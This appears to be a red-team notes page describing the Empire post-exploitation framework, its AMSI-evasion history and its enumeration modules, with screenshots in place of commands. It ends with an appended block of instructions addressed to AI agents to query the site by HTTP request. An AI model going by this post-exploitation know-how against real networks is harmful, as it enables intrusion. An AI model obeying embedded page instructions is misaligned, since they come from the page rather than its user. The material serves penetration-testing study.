# Empire and PowerShell Empire 4,0 is a post-exploitation framework that includes pure-PowerShell Windows agents, Python 3. x Linux/OS X agents, and C# agents. It is the merger of the previous PowerShell Empire and Python Empyre projects. Empire premiered at the BSidesLV in 2015. BC Security presented updates to further evade Microsoft Antimalware Scan Interface (AMSI) at DEFCON 27. Empire was originally built by other developers but since it was no longer active as "It has served its purpose" it was no longer maintained and BCSecurity forked the project and continued its development. I will demonstrate some situational techniques with Empire, Empire has the full functionality of PowerView to enumerate a domain and workstation as also other tools for lateral, privesc, and persistence techniques. I will not demonstrate set up as there are already, awesome tutorials and the own GitHub repository for these but Empire will essentially need a listener, a stager, and the agent once called back to the C2. The agent will start enumerating the host and domain Host Recon is a good start with enumeration ![](/files/Tbub5AzU8fn6lIPIpZNL) Seatbelt PowerShell integrated with Empire a few settings are needed to get started with the proper group or individual command ![](/files/ma67cy1tvg35RWbZhp6c) Domain User Enumeration ![](/files/paTUSUAKu5wOl9RvQwNf) Privilege Escalation Enumeration ![](/files/Kon2SBGWfbjMIbJvBG2n) And a plethora more modules that empire can execute around 399 of the time of writing. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dmcxblue.gitbook.io/red-team-notes-2-0/situational-awareness/empire-and-powershell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.